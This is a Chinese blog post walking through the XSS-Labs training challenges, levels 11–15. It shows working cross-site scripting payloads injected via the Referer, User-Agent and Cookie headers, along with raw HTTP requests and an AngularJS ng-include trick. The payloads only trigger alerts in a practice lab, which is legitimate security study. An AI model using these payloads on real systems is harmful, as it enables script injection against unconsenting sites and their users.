文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布
首页
学习
活动
专区
圈层
工具
MCP广场
返回腾讯云官网
社区首页 >专栏 >XSS-Labs之Level11-20

XSS-Labs之Level11-20

作者头像
Andromeda
发布2022-10-27 14:23:58
发布2022-10-27 14:23:58
41700
代码可运行
举报
文章被收录于专栏:Andromeda的专栏Andromeda的专栏
运行总次数:0
代码可运行

level 11

referer

查看源代码,发现了和level 10一样的隐藏表单。给每个隐藏变量传参,查看源代码,发现只有t_sort可以接受参数。

代码语言:javascript
代码运行次数:0
运行
复制
http://xss-labs/level11.php?name=xss&t__link=xss&t__history=xss&t__sort=xss&t__ref=xss

尝试和level 10一样构造参数,发现被过滤了。(实在是想不出来了,偷偷看亿眼后端源代码)

代码语言:javascript
代码运行次数:0
运行
复制
# 关键代码
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
<input name="t_ref"  value="'.$str33.'" type="hidden">

获取请求头中referer的数据,过滤<>,并赋值给t_ref

用burpsuite抓包发现请求头中没有referer

代码语言:javascript
代码运行次数:0
运行
复制
GET /level11.php?name=xss&t__link=xss&t__history=xss&t__sort=xss&t__ref=xss HTTP/1.1
Host: xss-labs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

firefoxMax HackBar(HackBar用不了,悲)添加referer。查看源代码,发现t_ref被赋值了,接下来的步骤就和level 11相同了。

传递referer: 1" type="" onmouseover="alert(/xss/),查看源代码发现拼接成功,鼠标移动到该元素上,跳出弹窗。

level 12

User-Agent

直接查看源代码,发现了四个隐藏表单,直接给这四个隐藏变量传值发现只有t_sort能接收2参数。

但是发现了一个特殊变量:

代码语言:javascript
代码运行次数:0
运行
复制
<input name="t_ua" value="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0" type="hidden">

t_ua的值为http请求头的User-Agent。通过burp suite抓包,尝试通过修改User-Agent的值来拼接代码:

1" type="" onmouseover="alert(/xss/)

放包,发现拼接成功,鼠标移动到该元素上,成功跳出窗口。

less 13

cookie

和前面两题类似,首先分析源代码,可知这道题的突破点在于cookie。burp suite抓包,修改cookie即可。

代码语言:javascript
代码运行次数:0
运行
复制
GET /level13.php?name=test HTTP/1.1
Host: xss-labs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: user=1"+type=""+onmouseover="alert(/xss/)
Upgrade-Insecure-Requests: 1

放包,查看源代码发现拼接成功,鼠标移动至该元素上,跳出弹窗。

less 14

貌似出错了?题目给的网址无法访问。

less 15

先看看AngularJS ng-include 指令差不多就有头绪了

这里可以让ng-include去包含第一关存在XSS漏洞的页面。

src='level1.php?name=<button onclick="alert(/xss/)">click</button>',可以发现源代码包含了该内容作为一个子节点。

点击即可。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022-08-15,如有侵权请联系 cloudcommunity@tencent.com 删除
agent
alert
button
cookie
xss

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

agent
alert
button
cookie
xss
评论
登录后参与评论
0 条评论
热度
最新
登录 后参与评论
推荐阅读
目录
  • level 11
  • level 12
  • less 13
  • less 14
  • less 15
领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

Copyright © 2013 - 2025 Tencent Cloud.

All Rights Reserved. 腾讯云 版权所有

登录 后参与评论